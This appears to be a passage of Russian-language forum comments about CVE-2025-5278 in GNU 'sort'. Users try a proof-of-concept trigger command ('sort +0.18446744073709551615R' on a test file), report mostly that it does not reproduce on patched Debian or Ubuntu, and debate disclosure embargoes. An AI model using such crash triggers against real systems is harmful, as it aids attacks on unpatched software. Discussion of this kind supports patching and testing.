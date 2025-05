2.2 , BUMP ( ? ), 11:30, 28/05/2025 [^] [^^] [^^^] [ответить] + / – >> contentecho -e "aa

bb" > poc_input.txt sort +0.18446744073709551615R /tmp/test

bb

aa

3.4 , eugener ( ok ), 11:34, 28/05/2025
Подтверждаю, не воспроизводится. Бубунта 22.04.

2.5 , Аноним ( 5 ), 11:38, 28/05/2025
$ nano /tmp/test

$ sort +0.18446744073709551615R /tmp/test

sort: open failed: +0.18446744073709551615R: No such file or directory

$ cat /tmp/test

1

aa

bb

3

4 Debian 10

3.9 , Аноним ( 5 ), 11:41, 28/05/2025
Так тоже не работает:
$ cat /tmp/test

1

aa

bb

2

3

$ sort +0.18446744073709551615R /tmp/test

sort: open failed: +0.18446744073709551615R: No such file or directory

4.12 , Аноним ( 12 ), 11:47, 28/05/2025
Нас обманули, расходимся.

2.14 , openssh_user ( ok ), 11:58, 28/05/2025
Debian 12 stable

$ sort +0.18446744073709551615R poc_input.txt

aa

bb
Видимо, уже прилетел сам патч. Кстати, не удивлюсь, если уязвимость найдена с помощью бредоИИ

3.66 , mittwerk (-), 14:29, 28/05/2025
https://security-tracker.debian.org/tracker/CVE-2025-5278

2.36 , Аноним ( 36 ), 12:35, 28/05/2025
так на скрине оно с санитайзером, а "Уязвимость может использоваться…" уже требует немного больше затрат, чем простой запуск команды

2.99 , Аноним ( - ), 17:12, 28/05/2025
>чет не воспроизводится:
А это сделано специально, чтобы ушлые люди вроде тебя не воспользовались данной уязвимсотью. Новсти об уязвимостях всегда публикуются после того, как их устранят. Обычно правила такие. После обнаружения авторам даётся трёх месячный срок на исправление.

3.126 , Аноним ( 126 ), 18:20, 28/05/2025
Нет никаких правил. Эмбарго на 90 дней всего лишь рекомендация. Никто не может тебе запретить публиковать в момент обнаружения, кроме собственной морали.